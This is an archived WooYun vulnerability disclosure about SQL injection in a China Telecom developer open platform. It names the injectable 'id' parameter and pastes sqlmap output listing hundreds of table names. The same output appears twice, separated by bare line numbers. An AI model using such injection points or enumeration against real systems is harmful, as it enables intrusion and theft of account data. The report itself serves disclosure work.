运营商安全之中国电信某开放平台SQL注入漏洞(涉及1.5W+开发者账号详细信息含账号密码\邮箱\账户金额等)

发表于 2015年07月11日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0125778

漏洞标题：运营商安全之中国电信某开放平台SQL注入漏洞(涉及1.5W+开发者账号详细信息含账号密码\邮箱\账户金额等)

漏洞详情

披露状态：

2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认，细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述：

有人问我，只看联通、移动？管管你找不到电信的高危漏洞？cncert评运营商的rank总是不高，不够客观。声明：脱库的事我干不出来，不要找我。

详细说明：

http://**.**.**.**/index.php?a=index&c=viewallability&m=api&id=3413id是注入点

[21:14:46] [INFO] fetching tables for database: 'emp'<br>
[21:14:46] [INFO] fetching number of tables for database 'emp'<br>
[21:14:46] [INFO] resumed: 1027<br>
[21:14:46] [INFO] resumed: emp_ability<br>
[21:14:46] [INFO] resumed: emp_ability_api<br>
[21:14:46] [INFO] resumed: emp_ability_api_rp<br>
[21:14:46] [INFO] resumed: emp_ability_api_statistics<br>
[21:14:46] [INFO] resumed: emp_ability_category<br>
[21:14:46] [INFO] resumed: emp_ability_collection<br>
[21:14:46] [INFO] resumed: emp_ability_dev<br>
[21:14:46] [INFO] resumed: emp_ability_new<br>
[21:14:46] [INFO] resumed: emp_ability_rp<br>
[21:14:46] [INFO] resumed: emp_ability_sendchannel_change_log<br>
[21:14:46] [INFO] resumed: emp_ability_sync_temp<br>
[21:14:46] [INFO] resumed: emp_ability_sync_temp_log<br>
[21:14:46] [INFO] resumed: emp_ability_tag<br>
[21:14:46] [INFO] resumed: emp_ability_unifyability<br>
[21:14:46] [INFO] resumed: emp_ability_version<br>
[21:14:46] [INFO] resumed: emp_access_ip<br>
[21:14:46] [INFO] resumed: emp_access_token<br>
[21:14:46] [INFO] resumed: emp_account_info_request<br>
[21:14:46] [INFO] resumed: emp_agreement<br>
[21:14:46] [INFO] resumed: emp_agreement_contract<br>
[21:14:46] [INFO] resumed: emp_api<br>
[21:14:46] [INFO] resumed: emp_api_access_history<br>
[21:14:46] [INFO] resumed: emp_api_admin_edit_log<br>
[21:14:46] [INFO] resumed: emp_api_param<br>
[21:14:46] [INFO] resumed: emp_api_rp<br>
[21:14:46] [INFO] resumed: emp_api_statistics<br>
[21:14:46] [INFO] resumed: emp_api_test_config<br>
[21:14:46] [INFO] resumed: emp_api_vote<br>
[21:14:46] [INFO] resumed: emp_app_ability<br>
[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_logger<br>
[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_temp<br>
[21:14:46] [INFO] resumed: emp_app_ability_rp<br>
[21:14:46] [INFO] resumed: emp_app_accounting_agreement<br>
[21:14:46] [INFO] resumed: emp_app_api_call_log<br>
[21:14:46] [INFO] resumed: emp_app_api_success_call<br>
[21:14:46] [INFO] resumed: emp_app_at_sync_temp<br>
[21:14:46] [INFO] resumed: emp_app_billing_black_list<br>
[21:14:46] [INFO] resumed: emp_app_billing_cdma_code<br>
[21:14:46] [INFO] resumed: emp_app_billing_month_accounting<br>
[21:14:46] [INFO] resumed: emp_app_channel<br>
[21:14:46] [INFO] resumed: emp_app_device_sync_temp<br>
[21:14:46] [INFO] resumed: emp_app_device_sync_temp_logger<br>
[21:14:46] [INFO] resumed: emp_app_ep_op_history<br>
[21:14:46] [INFO] resumed: emp_app_ep_op_reason_history<br>
[21:14:46] [INFO] resumed: emp_app_hot<br>
[21:14:46] [INFO] resumed: emp_app_ims_url<br>
[21:14:46] [INFO] resumed: emp_app_info<br>
[21:14:46] [INFO] resumed: emp_app_info_history<br>
[21:14:46] [INFO] resumed: emp_app_info_rp<br>
[21:14:46] [INFO] resumed: emp_app_info_sync_logger<br>
[21:14:46] [INFO] resumed: emp_app_info_sync_temp<br>
[21:14:46] [INFO] resumed: emp_app_message_sync_logger<br>
[21:14:46] [INFO] resumed: emp_app_message_sync_temp<br>
[21:14:46] [INFO] resumed: emp_app_phone_white_list<br>
[21:14:46] [INFO] resumed: emp_app_sdk<br>
[21:14:46] [INFO] resumed: emp_app_sms_spread_code<br>
[21:14:46] [INFO] resumed: emp_app_spread<br>
[21:14:46] [INFO] resumed: emp_app_struct_tags<br>
[21:14:46] [INFO] resumed: emp_app_tags<br>
[21:14:46] [INFO] resumed: emp_app_testing_audit<br>
[21:14:46] [INFO] resumed: emp_app_version<br>
[21:14:46] [INFO] resumed: emp_app_white_list<br>
[21:14:46] [INFO] resumed: emp_attachament_ref<br>
[21:14:46] [INFO] resumed: emp_authorization_code<br>
[21:14:46] [INFO] resumed: emp_authorization_remove_log<br>
[21:14:46] [INFO] resumed: emp_authorization_sync_logger<br>
[21:14:46] [INFO] resumed: emp_authorization_sync_temp<br>
[21:14:46] [INFO] resumed: emp_authorize_request<br>
[21:14:46] [INFO] resumed: emp_authorize_traffic<br>
[21:14:46] [INFO] resumed: emp_bestpay_order<br>
[21:14:46] [INFO] resumed: emp_billing<br>
[21:14:46] [INFO] resumed: emp_billing_app_white_list<br>
[21:14:46] [INFO] resumed: emp_billing_limit<br>
[21:14:46] [INFO] resumed: emp_billing_order_relation<br>
[21:14:46] [INFO] resumed: emp_billing_order_relation_log<br>
[21:14:46] [INFO] resumed: emp_billing_phone_limit<br>
[21:14:46] [INFO] resumed: emp_billing_price_auth<br>
[21:14:46] [INFO] resumed: emp_billing_price_config<br>
[21:14:46] [INFO] resumed: emp_billing_push<br>
[21:14:46] [INFO] resumed: emp_billing_push_log<br>
[21:14:46] [INFO] resumed: emp_billing_sms_received_notify<br>
[21:14:46] [INFO] resumed: emp_billing_sms_result<br>
[21:14:46] [INFO] resumed: emp_billing_sms_sending<br>
[21:14:46] [INFO] resumed: emp_billing_token<br>
[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_logger<br>
[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_temp<br>
[21:14:46] [INFO] resumed: emp_cdma_code<br>
[21:14:46] [INFO] resumed: emp_cdma_code2<br>
[21:14:46] [INFO] resumed: emp_cloudycode_from_source<br>
[21:14:46] [INFO] resumed: emp_cloudyserver<br>
[21:14:46] [INFO] resumed: emp_cloudyserver_history<br>
[21:14:46] [INFO] resumed: emp_cloudyserver_recycle<br>
[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data<br>
[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data_back<br>
[21:14:46] [INFO] resumed: emp_cms_ability_sdk_api_count<br>
[21:14:46] [INFO] resumed: emp_cms_admin<br>
[21:14:46] [INFO] resumed: emp_cms_admin_panel<br>
[21:14:46] [INFO] resumed: emp_cms_admin_role<br>
[21:14:46] [INFO] resumed: emp_cms_admin_role_priv<br>
[21:14:46] [INFO] resumed: emp_cms_admin_role_ref<br>
[21:14:46] [INFO] resumed: emp_cms_announce<br>
[21:14:46] [INFO] resumed: emp_cms_api<br>
[21:14:46] [INFO] resumed: emp_cms_api_data<br>
[21:14:46] [INFO] resumed: emp_cms_app_recommend<br>
[21:14:46] [INFO] resumed: emp_cms_attachment<br>
[21:14:46] [INFO] resumed: emp_cms_attachment_index<br>
[21:14:46] [INFO] resumed: emp_cms_audit_msg_fav<br>
[21:14:46] [INFO] resumed: emp_cms_badword<br>
[21:14:46] [INFO] resumed: emp_cms_cache<br>
[21:14:46] [INFO] resumed: emp_cms_category<br>
[21:14:46] [INFO] resumed: emp_cms_category_priv<br>
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_appadd<br>
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_dispatchlist<br>
[21:14:46] [INFO] resumed: emp_cms_cloud_testing_modelgetspecimens<br>
[21:14:46] [INFO] resumed: emp_cms_comment<br>
[21:14:46] [INFO] resumed: emp_cms_comment_check<br>
[21:14:46] [INFO] resumed: emp_cms_comment_data_1<br>
[21:14:46] [INFO] resumed: emp_cms_comment_setting<br>
[21:14:46] [INFO] resumed: emp_cms_comment_table<br>
[21:14:46] [INFO] resumed: emp_cms_content_check<br>
[21:14:46] [INFO] resumed: emp_cms_copyfrom<br>
[21:14:46] [INFO] resumed: emp_cms_email<br>
[21:14:46] [INFO] resumed: emp_cms_email_queue<br>
[21:14:46] [INFO] resumed: emp_cms_email_template<br>
[21:14:46] [INFO] resumed: emp_cms_extend_setting<br>
[21:14:46] [INFO] resumed: emp_cms_favorite<br>
[21:14:46] [INFO] resumed: emp_cms_form_open_sign<br>
[21:14:46] [INFO] resumed: emp_cms_hits<br>
[21:14:46] [INFO] resumed: emp_cms_invcode<br>
[21:14:46] [INFO] resumed: emp_cms_invcode_type<br>
[21:14:46] [INFO] resumed: emp_cms_ipbanned<br>
[21:14:46] [INFO] resumed: emp_cms_keylink<br>
[21:14:46] [INFO] resumed: emp_cms_link<br>
[21:14:46] [INFO] resumed: emp_cms_linkage<br>
[21:14:46] [INFO] resumed: emp_cms_log<br>
[21:14:46] [INFO] resumed: emp_cms_member<br>
[21:14:46] [INFO] resumed: emp_cms_member_company<br>
[21:14:46] [INFO] resumed: emp_cms_member_detail<br>
[21:14:46] [INFO] resumed: emp_cms_member_enabler<br>
[21:14:46] [INFO] resumed: emp_cms_member_enabler_rp<br>
[21:14:46] [INFO] resumed: emp_cms_member_free_times<br>
[21:14:46] [INFO] resumed: emp_cms_member_group<br>
[21:14:46] [INFO] resumed: emp_cms_member_hand_package<br>
[21:14:46] [INFO] resumed: emp_cms_member_hand_package_data<br>
[21:14:46] [INFO] resumed: emp_cms_member_hand_package_log<br>
[21:14:46] [INFO] resumed: emp_cms_member_invite<br>
[21:14:46] [INFO] resumed: emp_cms_member_menu<br>
[21:14:46] [INFO] resumed: emp_cms_member_package<br>
[21:14:46] [INFO] resumed: emp_cms_member_package_sync_logger<br>
[21:14:46] [INFO] resumed: emp_cms_member_package_sync_temp<br>
[21:14:46] [INFO] resumed: emp_cms_member_send_mark<br>
[21:14:46] [INFO] resumed: emp_cms_member_verify<br>
[21:14:46] [INFO] resumed: emp_cms_member_vip<br>
[21:14:46] [INFO] resumed: emp_cms_menu<br>
[21:14:46] [INFO] resumed: emp_cms_message<br>
[21:14:46] [INFO] resumed: emp_cms_message_category<br>
[21:14:46] [INFO] resumed: emp_cms_message_conversation<br>
[21:14:46] [INFO] resumed: emp_cms_message_data<br>
[21:14:46] [INFO] resumed: emp_cms_message_group<br>
[21:14:46] [INFO] resumed: emp_cms_model<br>
[21:14:46] [INFO] resumed: emp_cms_model_field<br>
[21:14:46] [INFO] resumed: emp_cms_module<br>
[21:14:46] [INFO] resumed: emp_cms_news<br>
[21:14:46] [INFO] resumed: emp_cms_news_data<br>
[21:14:46] [INFO] resumed: emp_cms_open<br>
[21:14:46] [INFO] resumed: emp_cms_open_data<br>
[21:14:46] [INFO] resumed: emp_cms_open_star<br>
[21:14:46] [INFO] resumed: emp_cms_package_order_change_log<br>
[21:14:46] [INFO] resumed: emp_cms_page<br>
[21:14:46] [INFO] resumed: emp_cms_page_log<br>
[21:14:46] [INFO] resumed: emp_cms_pay_account<br>
[21:14:46] [INFO] resumed: emp_cms_pay_coupon<br>
[21:14:46] [INFO] resumed: emp_cms_pay_coupon_code<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_dedicated<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_sender_info<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_tmp<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_order<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_order_data<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_logger<br>
[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_temp<br>
[21:14:46] [INFO] resumed: emp_cms_pay_payment<br>
[21:14:46] [INFO] resumed: emp_cms_pay_spend<br>
[21:14:46] [INFO] resumed: emp_cms_plugin<br>
[21:14:46] [INFO] resumed: emp_cms_plugin_var<br>
[21:14:46] [INFO] resumed: emp_cms_position<br>
[21:14:46] [INFO] resumed: emp_cms_position_data<br>
[21:14:46] [INFO] resumed: emp_cms_poster<br>
[21:14:46] [INFO] resumed: emp_cms_poster_201506<br>
[21:14:46] [INFO] resumed: emp_cms_poster_201507<br>
[21:14:46] [INFO] resumed: emp_cms_poster_space<br>
[21:14:46] [INFO] resumed: emp_cms_print_invoice_sender_log<br>
[21:14:46] [INFO] resumed: emp_cms_queue<br>
[21:14:46] [INFO] resumed: emp_cms_release_point<br>
[21:14:46] [INFO] resumed: emp_cms_search<br>
[21:14:46] [INFO] resumed: emp_cms_search_keyword<br>
[21:14:46] [INFO] resumed: emp_cms_session<br>
[21:14:46] [INFO] resumed: emp_cms_site<br>
[21:14:46] [INFO] resumed: emp_cms_sms_report<br>
[21:14:46] [INFO] resumed: emp_cms_sphinx_counter<br>
[21:14:46] [INFO] resumed: emp_cms_suggestion<br>
[21:14:46] [INFO] resumed: emp_cms_template_bak<br>
[21:14:46] [INFO] resumed: emp_cms_times<br>
[21:14:46] [INFO] resumed: emp_cms_type<br>
[21:14:46] [INFO] resumed: emp_cms_urlrule<br>
[21:14:46] [INFO] resumed: emp_cms_workflow<br>
[21:14:46] [INFO] resumed: emp_contract_info<br>
[21:14:46] [INFO] resumed: emp_contract_info_in_template<br>
[21:14:46] [INFO] resumed: emp_d_20130724<br>
[21:14:46] [INFO] resumed: emp_d_20130725<br>
[21:14:46] [INFO] resumed: emp_d_20130726<br>
[21:14:46] [INFO] resumed: emp_d_20130727<br>
[21:14:46] [INFO] resumed: emp_d_20130728<br>
[21:14:46] [INFO] resumed: emp_d_20130729<br>
[21:14:46] [INFO] resumed: emp_d_20130730<br>
[21:14:46] [INFO] resumed: emp_d_20130731<br>
[21:14:46] [INFO] resumed: emp_d_20130801<br>
[21:14:46] [INFO] resumed: emp_d_20130802<br>
[21:14:46] [INFO] resumed: emp_d_20130803<br>
[21:14:46] [INFO] resumed: emp_d_20130804<br>
[21:14:46] [INFO] resumed: emp_d_20130805<br>
[21:14:46] [INFO] resumed: emp_d_20130806<br>
[21:14:46] [INFO] resumed: emp_d_20130807<br>
[21:14:46] [INFO] resumed: emp_d_20130808<br>
[21:14:46] [INFO] resumed: emp_d_20130809<br>
[21:14:46] [INFO] resumed: emp_d_20130810<br>
[21:14:46] [INFO] resumed: emp_d_20130811<br>
[21:14:46] [INFO] resumed: emp_d_20130812<br>
[21:14:46] [INFO] resumed: emp_d_20130813<br>
[21:14:46] [INFO] resumed: emp_d_20130814<br>
[21:14:46] [INFO] resumed: emp_d_20130815<br>
[21:14:46] [INFO] resumed: emp_d_20130816<br>
[21:14:46] [INFO] resumed: emp_d_20130817<br>
[21:14:46] [INFO] resumed: emp_d_20130818<br>
[21:14:46] [INFO] resumed: emp_d_20130819<br>
[21:14:46] [INFO] resumed: emp_d_20130820<br>
[21:14:46] [INFO] resumed: emp_d_20130821<br>
[21:14:46] [INFO] resumed: emp_d_20130822<br>
[21:14:46] [INFO] resumed: emp_d_20130823<br>
[21:14:46] [INFO] resumed: emp_d_20130824<br>
[21:14:46] [INFO] resumed: emp_d_20130825<br>
[21:14:46] [INFO] resumed: emp_d_20130826<br>
[21:14:46] [INFO] resumed: emp_d_20130827<br>
[21:14:46] [INFO] resumed: emp_d_20130828<br>
[21:14:46] [INFO] resumed: emp_d_20130829<br>
[21:14:46] [INFO] resumed: emp_d_20130830<br>
[21:14:46] [INFO] resumed: emp_d_20130831<br>
[21:14:46] [INFO] resumed: emp_d_20130901<br>
[21:14:46] [INFO] resumed: emp_d_20130902<br>
[21:14:46] [INFO] resumed: emp_d_20130903<br>
[21:14:46] [INFO] resumed: emp_d_20130904<br>
[21:14:46] [INFO] resumed: emp_d_20130905<br>
[21:14:46] [INFO] resumed: emp_d_20130906<br>
[21:14:46] [INFO] resumed: emp_d_20130907<br>
[21:14:46] [INFO] resumed: emp_d_20130908<br>
[21:14:46] [INFO] resumed: emp_d_20130909<br>
[21:14:46] [INFO] resumed: emp_d_20130910<br>
[21:14:46] [INFO] resumed: emp_d_20130911<br>
[21:14:46] [INFO] resumed: emp_d_20130912<br>
[21:14:46] [INFO] resumed: emp_d_20130913<br>
[21:14:46] [INFO] resumed: emp_d_20130914<br>
[21:14:46] [INFO] resumed: emp_d_20130915<br>
[21:14:46] [INFO] resumed: emp_d_20130916<br>
[21:14:46] [INFO] resumed: emp_d_20130917<br>
[21:14:46] [INFO] resumed: emp_d_20130918<br>
[21:14:46] [INFO] resumed: emp_d_20130919<br>
.......

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

[21:14:46] [INFO] fetching tables for database: 'emp'

[21:14:46] [INFO] fetching number of tables for database 'emp'

[21:14:46] [INFO] resumed: 1027

[21:14:46] [INFO] resumed: emp_ability

[21:14:46] [INFO] resumed: emp_ability_api

[21:14:46] [INFO] resumed: emp_ability_api_rp

[21:14:46] [INFO] resumed: emp_ability_api_statistics

[21:14:46] [INFO] resumed: emp_ability_category

[21:14:46] [INFO] resumed: emp_ability_collection

[21:14:46] [INFO] resumed: emp_ability_dev

[21:14:46] [INFO] resumed: emp_ability_new

[21:14:46] [INFO] resumed: emp_ability_rp

[21:14:46] [INFO] resumed: emp_ability_sendchannel_change_log

[21:14:46] [INFO] resumed: emp_ability_sync_temp

[21:14:46] [INFO] resumed: emp_ability_sync_temp_log

[21:14:46] [INFO] resumed: emp_ability_tag

[21:14:46] [INFO] resumed: emp_ability_unifyability

[21:14:46] [INFO] resumed: emp_ability_version

[21:14:46] [INFO] resumed: emp_access_ip

[21:14:46] [INFO] resumed: emp_access_token

[21:14:46] [INFO] resumed: emp_account_info_request

[21:14:46] [INFO] resumed: emp_agreement

[21:14:46] [INFO] resumed: emp_agreement_contract

[21:14:46] [INFO] resumed: emp_api

[21:14:46] [INFO] resumed: emp_api_access_history

[21:14:46] [INFO] resumed: emp_api_admin_edit_log

[21:14:46] [INFO] resumed: emp_api_param

[21:14:46] [INFO] resumed: emp_api_rp

[21:14:46] [INFO] resumed: emp_api_statistics

[21:14:46] [INFO] resumed: emp_api_test_config

[21:14:46] [INFO] resumed: emp_api_vote

[21:14:46] [INFO] resumed: emp_app_ability

[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_logger

[21:14:46] [INFO] resumed: emp_app_ability_contract_sync_temp

[21:14:46] [INFO] resumed: emp_app_ability_rp

[21:14:46] [INFO] resumed: emp_app_accounting_agreement

[21:14:46] [INFO] resumed: emp_app_api_call_log

[21:14:46] [INFO] resumed: emp_app_api_success_call

[21:14:46] [INFO] resumed: emp_app_at_sync_temp

[21:14:46] [INFO] resumed: emp_app_billing_black_list

[21:14:46] [INFO] resumed: emp_app_billing_cdma_code

[21:14:46] [INFO] resumed: emp_app_billing_month_accounting

[21:14:46] [INFO] resumed: emp_app_channel

[21:14:46] [INFO] resumed: emp_app_device_sync_temp

[21:14:46] [INFO] resumed: emp_app_device_sync_temp_logger

[21:14:46] [INFO] resumed: emp_app_ep_op_history

[21:14:46] [INFO] resumed: emp_app_ep_op_reason_history

[21:14:46] [INFO] resumed: emp_app_hot

[21:14:46] [INFO] resumed: emp_app_ims_url

[21:14:46] [INFO] resumed: emp_app_info

[21:14:46] [INFO] resumed: emp_app_info_history

[21:14:46] [INFO] resumed: emp_app_info_rp

[21:14:46] [INFO] resumed: emp_app_info_sync_logger

[21:14:46] [INFO] resumed: emp_app_info_sync_temp

[21:14:46] [INFO] resumed: emp_app_message_sync_logger

[21:14:46] [INFO] resumed: emp_app_message_sync_temp

[21:14:46] [INFO] resumed: emp_app_phone_white_list

[21:14:46] [INFO] resumed: emp_app_sdk

[21:14:46] [INFO] resumed: emp_app_sms_spread_code

[21:14:46] [INFO] resumed: emp_app_spread

[21:14:46] [INFO] resumed: emp_app_struct_tags

[21:14:46] [INFO] resumed: emp_app_tags

[21:14:46] [INFO] resumed: emp_app_testing_audit

[21:14:46] [INFO] resumed: emp_app_version

[21:14:46] [INFO] resumed: emp_app_white_list

[21:14:46] [INFO] resumed: emp_attachament_ref

[21:14:46] [INFO] resumed: emp_authorization_code

[21:14:46] [INFO] resumed: emp_authorization_remove_log

[21:14:46] [INFO] resumed: emp_authorization_sync_logger

[21:14:46] [INFO] resumed: emp_authorization_sync_temp

[21:14:46] [INFO] resumed: emp_authorize_request

[21:14:46] [INFO] resumed: emp_authorize_traffic

[21:14:46] [INFO] resumed: emp_bestpay_order

[21:14:46] [INFO] resumed: emp_billing

[21:14:46] [INFO] resumed: emp_billing_app_white_list

[21:14:46] [INFO] resumed: emp_billing_limit

[21:14:46] [INFO] resumed: emp_billing_order_relation

[21:14:46] [INFO] resumed: emp_billing_order_relation_log

[21:14:46] [INFO] resumed: emp_billing_phone_limit

[21:14:46] [INFO] resumed: emp_billing_price_auth

[21:14:46] [INFO] resumed: emp_billing_price_config

[21:14:46] [INFO] resumed: emp_billing_push

[21:14:46] [INFO] resumed: emp_billing_push_log

[21:14:46] [INFO] resumed: emp_billing_sms_received_notify

[21:14:46] [INFO] resumed: emp_billing_sms_result

[21:14:46] [INFO] resumed: emp_billing_sms_sending

[21:14:46] [INFO] resumed: emp_billing_token

[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_logger

[21:14:46] [INFO] resumed: emp_cancel_authorization_sync_temp

[21:14:46] [INFO] resumed: emp_cdma_code

[21:14:46] [INFO] resumed: emp_cdma_code2

[21:14:46] [INFO] resumed: emp_cloudycode_from_source

[21:14:46] [INFO] resumed: emp_cloudyserver

[21:14:46] [INFO] resumed: emp_cloudyserver_history

[21:14:46] [INFO] resumed: emp_cloudyserver_recycle

[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data

[21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data_back

[21:14:46] [INFO] resumed: emp_cms_ability_sdk_api_count

[21:14:46] [INFO] resumed: emp_cms_admin

[21:14:46] [INFO] resumed: emp_cms_admin_panel

[21:14:46] [INFO] resumed: emp_cms_admin_role

[21:14:46] [INFO] resumed: emp_cms_admin_role_priv

[21:14:46] [INFO] resumed: emp_cms_admin_role_ref

[21:14:46] [INFO] resumed: emp_cms_announce

[21:14:46] [INFO] resumed: emp_cms_api

[21:14:46] [INFO] resumed: emp_cms_api_data

[21:14:46] [INFO] resumed: emp_cms_app_recommend

[21:14:46] [INFO] resumed: emp_cms_attachment

[21:14:46] [INFO] resumed: emp_cms_attachment_index

[21:14:46] [INFO] resumed: emp_cms_audit_msg_fav

[21:14:46] [INFO] resumed: emp_cms_badword

[21:14:46] [INFO] resumed: emp_cms_cache

[21:14:46] [INFO] resumed: emp_cms_category

[21:14:46] [INFO] resumed: emp_cms_category_priv

[21:14:46] [INFO] resumed: emp_cms_cloud_testing_appadd

[21:14:46] [INFO] resumed: emp_cms_cloud_testing_dispatchlist

[21:14:46] [INFO] resumed: emp_cms_cloud_testing_modelgetspecimens

[21:14:46] [INFO] resumed: emp_cms_comment

[21:14:46] [INFO] resumed: emp_cms_comment_check

[21:14:46] [INFO] resumed: emp_cms_comment_data_1

[21:14:46] [INFO] resumed: emp_cms_comment_setting

[21:14:46] [INFO] resumed: emp_cms_comment_table

[21:14:46] [INFO] resumed: emp_cms_content_check

[21:14:46] [INFO] resumed: emp_cms_copyfrom

[21:14:46] [INFO] resumed: emp_cms_email

[21:14:46] [INFO] resumed: emp_cms_email_queue

[21:14:46] [INFO] resumed: emp_cms_email_template

[21:14:46] [INFO] resumed: emp_cms_extend_setting

[21:14:46] [INFO] resumed: emp_cms_favorite

[21:14:46] [INFO] resumed: emp_cms_form_open_sign

[21:14:46] [INFO] resumed: emp_cms_hits

[21:14:46] [INFO] resumed: emp_cms_invcode

[21:14:46] [INFO] resumed: emp_cms_invcode_type

[21:14:46] [INFO] resumed: emp_cms_ipbanned

[21:14:46] [INFO] resumed: emp_cms_keylink

[21:14:46] [INFO] resumed: emp_cms_link

[21:14:46] [INFO] resumed: emp_cms_linkage

[21:14:46] [INFO] resumed: emp_cms_log

[21:14:46] [INFO] resumed: emp_cms_member

[21:14:46] [INFO] resumed: emp_cms_member_company

[21:14:46] [INFO] resumed: emp_cms_member_detail

[21:14:46] [INFO] resumed: emp_cms_member_enabler

[21:14:46] [INFO] resumed: emp_cms_member_enabler_rp

[21:14:46] [INFO] resumed: emp_cms_member_free_times

[21:14:46] [INFO] resumed: emp_cms_member_group

[21:14:46] [INFO] resumed: emp_cms_member_hand_package

[21:14:46] [INFO] resumed: emp_cms_member_hand_package_data

[21:14:46] [INFO] resumed: emp_cms_member_hand_package_log

[21:14:46] [INFO] resumed: emp_cms_member_invite

[21:14:46] [INFO] resumed: emp_cms_member_menu

[21:14:46] [INFO] resumed: emp_cms_member_package

[21:14:46] [INFO] resumed: emp_cms_member_package_sync_logger

[21:14:46] [INFO] resumed: emp_cms_member_package_sync_temp

[21:14:46] [INFO] resumed: emp_cms_member_send_mark

[21:14:46] [INFO] resumed: emp_cms_member_verify

[21:14:46] [INFO] resumed: emp_cms_member_vip

[21:14:46] [INFO] resumed: emp_cms_menu

[21:14:46] [INFO] resumed: emp_cms_message

[21:14:46] [INFO] resumed: emp_cms_message_category

[21:14:46] [INFO] resumed: emp_cms_message_conversation

[21:14:46] [INFO] resumed: emp_cms_message_data

[21:14:46] [INFO] resumed: emp_cms_message_group

[21:14:46] [INFO] resumed: emp_cms_model

[21:14:46] [INFO] resumed: emp_cms_model_field

[21:14:46] [INFO] resumed: emp_cms_module

[21:14:46] [INFO] resumed: emp_cms_news

[21:14:46] [INFO] resumed: emp_cms_news_data

[21:14:46] [INFO] resumed: emp_cms_open

[21:14:46] [INFO] resumed: emp_cms_open_data

[21:14:46] [INFO] resumed: emp_cms_open_star

[21:14:46] [INFO] resumed: emp_cms_package_order_change_log

[21:14:46] [INFO] resumed: emp_cms_page

[21:14:46] [INFO] resumed: emp_cms_page_log

[21:14:46] [INFO] resumed: emp_cms_pay_account

[21:14:46] [INFO] resumed: emp_cms_pay_coupon

[21:14:46] [INFO] resumed: emp_cms_pay_coupon_code

[21:14:46] [INFO] resumed: emp_cms_pay_package

[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice

[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_dedicated

[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_sender_info

[21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_tmp

[21:14:46] [INFO] resumed: emp_cms_pay_package_order

[21:14:46] [INFO] resumed: emp_cms_pay_package_order_data

[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_logger

[21:14:46] [INFO] resumed: emp_cms_pay_package_sync_temp

[21:14:46] [INFO] resumed: emp_cms_pay_payment

[21:14:46] [INFO] resumed: emp_cms_pay_spend

[21:14:46] [INFO] resumed: emp_cms_plugin

[21:14:46] [INFO] resumed: emp_cms_plugin_var

[21:14:46] [INFO] resumed: emp_cms_position

[21:14:46] [INFO] resumed: emp_cms_position_data

[21:14:46] [INFO] resumed: emp_cms_poster

[21:14:46] [INFO] resumed: emp_cms_poster_201506

[21:14:46] [INFO] resumed: emp_cms_poster_201507

[21:14:46] [INFO] resumed: emp_cms_poster_space

[21:14:46] [INFO] resumed: emp_cms_print_invoice_sender_log

[21:14:46] [INFO] resumed: emp_cms_queue

[21:14:46] [INFO] resumed: emp_cms_release_point

[21:14:46] [INFO] resumed: emp_cms_search

[21:14:46] [INFO] resumed: emp_cms_search_keyword

[21:14:46] [INFO] resumed: emp_cms_session

[21:14:46] [INFO] resumed: emp_cms_site

[21:14:46] [INFO] resumed: emp_cms_sms_report

[21:14:46] [INFO] resumed: emp_cms_sphinx_counter

[21:14:46] [INFO] resumed: emp_cms_suggestion

[21:14:46] [INFO] resumed: emp_cms_template_bak

[21:14:46] [INFO] resumed: emp_cms_times

[21:14:46] [INFO] resumed: emp_cms_type

[21:14:46] [INFO] resumed: emp_cms_urlrule

[21:14:46] [INFO] resumed: emp_cms_workflow

[21:14:46] [INFO] resumed: emp_contract_info

[21:14:46] [INFO] resumed: emp_contract_info_in_template

[21:14:46] [INFO] resumed: emp_d_20130724

[21:14:46] [INFO] resumed: emp_d_20130725

[21:14:46] [INFO] resumed: emp_d_20130726

[21:14:46] [INFO] resumed: emp_d_20130727

[21:14:46] [INFO] resumed: emp_d_20130728

[21:14:46] [INFO] resumed: emp_d_20130729

[21:14:46] [INFO] resumed: emp_d_20130730

[21:14:46] [INFO] resumed: emp_d_20130731

[21:14:46] [INFO] resumed: emp_d_20130801

[21:14:46] [INFO] resumed: emp_d_20130802

[21:14:46] [INFO] resumed: emp_d_20130803

[21:14:46] [INFO] resumed: emp_d_20130804

[21:14:46] [INFO] resumed: emp_d_20130805

[21:14:46] [INFO] resumed: emp_d_20130806

[21:14:46] [INFO] resumed: emp_d_20130807

[21:14:46] [INFO] resumed: emp_d_20130808

[21:14:46] [INFO] resumed: emp_d_20130809

